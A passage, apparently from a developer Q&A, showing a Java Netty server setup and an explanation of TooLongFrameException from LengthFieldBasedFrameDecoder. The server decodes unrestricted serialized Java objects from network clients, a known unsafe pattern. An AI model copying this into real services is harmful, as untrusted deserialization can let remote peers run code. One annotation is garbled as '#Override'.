public static void main(String[] args) throws Exception {
MyProps p = new MyProps();
int port = p.getServerPort();
new Server().startServer(port, false);
}
private void startServer(int port, boolean ssl) throws CertificateException, SSLException, InterruptedException {
EventLoopGroup bossGroup = new NioEventLoopGroup(1);
EventLoopGroup workerGroup = new NioEventLoopGroup();
try {
ServerBootstrap b = new ServerBootstrap();
b.group(bossGroup, workerGroup)
.channel(NioServerSocketChannel.class)
.handler(new LoggingHandler(LogLevel.INFO))
.childHandler(new ChannelInitializer<SocketChannel>() {
#Override
public void initChannel(SocketChannel ch) throws Exception {
ChannelPipeline p = ch.pipeline();
p.addLast(
new ObjectEncoder(),
new ObjectDecoder(ClassResolvers.cacheDisabled(null)),
new ServerHandler());
}
});
b.bind(port).sync().channel().closeFuture().sync();
log.info("connected!");
} finally {
bossGroup.shutdownGracefully();
workerGroup.shutdownGracefully();
}
}
}
The TooLongFrameException raised by LengthFieldBasedFrameDecoder means one of the following:
The remote peer sent a very large message, which exceeds the limit. The default maximum length of a message is 1 MiB. If you expect to receive a message larger than that, specify an alternative maximum length when you construct a LengthFieldBasedFrameDecoder.
You passed wrong parameters to LengthFieldBasedFrameDecoder so that it is decoding a wrong place in your message. In this case, you'd better re-read the Javadoc of LengthFieldBasedFrameDecoder to specify the correct values for you.